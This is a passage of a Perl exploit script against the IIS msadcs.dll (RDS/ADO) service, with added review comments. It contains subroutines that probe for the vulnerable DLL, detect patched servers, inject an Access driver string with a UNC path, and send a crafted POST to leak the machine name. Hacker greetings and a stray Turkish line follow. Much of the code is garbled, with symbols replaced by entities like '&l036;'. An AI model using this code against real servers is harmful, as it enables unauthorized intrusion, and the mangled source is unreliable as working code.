# when no blank line is found - callers then index from the end of @in.
# NOTE(review): "1.[01]" leaves the "." unescaped, so it matches any
# character, not only a literal dot.
sub content_start &l123; l this will take in the server headers
my (@in)=@_; my &l036;c;
for (&l036;c=1;&l036;c<500;&l036;c++) &l123; l assume there&l039;s less than 500 headers
if(&l036;in[&l036;c] =~/^&l92;x0d&l92;x0a/)&l123;
if (&l036;in[&l036;c+1]=~/^HTTP&l92;/1.[01] [12]00/) &l123; &l036;c++; }
else &l123; return &l036;c+1; }}}
return -1;} l it should never get here actually

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Inspect the ODBC error text of a failed attempt and abort the whole
# script on replies that mean further attempts are pointless: a missing
# ADO provider, a required handler, or access denied by the handler or
# server.  Returns silently for any other error.
# NOTE(review): odbc_error is called again here although the caller in
# try_btcustmr has just called it on the same response (and odbc_error can
# itself exit); "miscofiguration" is a typo inside a runtime string and is
# left untouched here.
sub funky &l123;
my (@in)=@_; my &l036;error=odbc_error(@in);
if(&l036;error=~/ADO could not find the specified provider/)&l123;
print "&l92;nServer returned an ADO miscofiguration message&l92;nAborting.&l92;n";
exit;}
if(&l036;error=~/A Handler is required/)&l123;
print "&l92;nServer has custom handler filters (they most likely are patched)&l92;n";
exit;}
if(&l036;error=~/specified Handler has denied Access/)&l123;
print "&l92;nADO handlers denied access (they most likely are patched)&l92;n";
exit;}
if(&l036;error=~/server has denied access/)&l123;
print "&l92;nADO handlers denied access (they most likely are patched)&l92;n";
exit;}}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Pre-flight check run once from the top level: GET /msadc/msadcs.dll and
# return (no value) when the first body line is application/x-varg.
# Otherwise report whether the server looks like IIS and exit the script.
# NOTE(review): grep("Server: ", @results) evaluates the string as a
# constant (true) expression for every element, so @s is a copy of the
# whole response and $s[0] is the status line rather than the Server
# header; `grep { /^Server: / } @results` was presumably intended, so the
# IIS test below currently inspects the wrong line.
sub has_msadc &l123;
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0&l92;n&l92;n");
my &l036;base=content_start(@results);
return if(&l036;results[&l036;base]=~/Content-Type: application&l92;/x-varg/);
my @s=grep("Server: ",@results);
if(&l036;s[0]!~/IIS/)&l123; print "Doh! They&l039;re not running IIS.&l92;n&l036;s[0]&l92;n" }
else &l123; print "/msadc/msadcs.dll was not found.&l92;n";}
exit;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Step 5 (-u): use the given UNC path as the Access dbq.  The argument is
# meant to be checked against \\server\share\file before create_table and
# run_query are tried; a success writes save("dbq=<unc>") and exits.
# NOTE(review): `!$uncpath =~ /.../` binds `!` before `=~`, so the negated
# scalar ("" or 1) is matched against the pattern instead of $uncpath, and
# the format check can never fire; `$uncpath !~ /.../` was presumably
# intended.  $uncpath and $driverline are globals.
sub use_unc &l123;
&l036;uncpath=&l036;args&l123;u};
&l036;driverline="driver=&l123;Microsoft Access Driver (*.mdb)};dbq=";
if(!&l036;uncpath=~/^&l92;&l92;&l92;&l92;[a-zA-Z0-9_.]+&l92;&l92;[-a-zA-Z0-9_]+&l92;&l92;.+/)&l123;
print "Your UNC path sucks. You need the following format:&l92;n".
"&l92;&l92;server(ip preferable)&l92;share&l92;some-file.mdb&l92;n&l92;n"; exit; }

if(create_table(&l036;driverline.&l036;uncpath))&l123;
if(run_query(&l036;driverline.&l036;uncpath))&l123;
print "Success!&l92;n"; save ("dbq=".&l036;uncpath); exit;}}
}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# -N: POST to the VbBusObj GetMachineName entry point with a zero-argument
# multipart body (Content-Length hard-coded to 126 to match the fixed
# boundary line) and print body line 6 of the reply, after stripping
# characters outside a printable set, as the machine name.
# NOTE(review): both the 126 and the +6 body offset are fixed constants;
# nothing checks that the response actually has a body at that index.
sub get_name &l123; l this was added last minute
my &l036;msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
User-Agent: ACTIVEDATA
Host: &l036;ip
Content-Length: 126
Connection: Keep-Alive

ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0

--!ADM!ROX!YOUR!WORLD!--
EOT
; &l036;msadc=~s/&l92;n/&l92;r&l92;n/g;
my @results=sendraw(&l036;msadc);
my &l036;base=content_start(@results);
&l036;results[&l036;base+6]=~s/[^-A-Za-z0-9!&l92;@&l92;l&l92;&l036;&l92;%^&l92;&*()&l92;[&l92;]_=+~<>.,?]//g;
print "Machine name: &l036;results[&l036;base+6]&l92;n";}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
#
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
#
# I wish I could really name everyone, but I can't. Don't feel slighted if
# you're not on the list... :)
##############################################################################


ALINTININ ALINTISININ ALINTISIDIR:D:puah
 